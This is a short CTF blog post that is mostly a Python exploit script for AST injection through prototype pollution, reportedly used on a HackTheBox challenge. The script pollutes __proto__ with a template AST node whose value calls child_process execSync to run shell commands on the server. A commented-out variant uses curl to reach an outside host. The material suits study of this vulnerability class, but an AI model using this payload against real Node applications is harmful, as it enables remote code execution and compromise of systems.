AST Injection Example

Nov. 29, 2020 // echel0n

Here is an AST Injection example. Exploit was relying on the error output.
It was used on HackTheBox CTF.
For further information, please consider reading this article.
https://blog.p6.is/AST-Injection/
Have a nice day!

  1. #!/usr/bin/env python
  2. import requests
  3. TARGET_URL = 'http://docker.hackthebox.eu:32561'
  4. # make pollution
  5. r = requests.post(TARGET_URL + '/api/submit', json = {
  6. "artist.__proto__.prototype.type": "Program",
  7. "artist.__proto__.name" : "Haigh",
  8. # "__proto__.name": "process.mainModule.require('child_process').execSync(`curl 'http://devilinside.me:8080/'`)",
  9. "artist.__proto__.body": [{
  10. "type": "MustacheStatement",
  11. "path": 0,
  12. "params": [{
  13. "type": "NumberLiteral",
  14. "value": "process.mainModule.require('child_process').execSync(`sh -c 'whoami'`)"
  15. }],
  16. "loc": {
  17. "start": 0,
  18. "end": 0
  19. }
  20. }]
  21. })
  22. # execute
  23. print(r.text)
  24. r = requests.get(TARGET_URL)
  25. # print(r.text)
  26. print("done")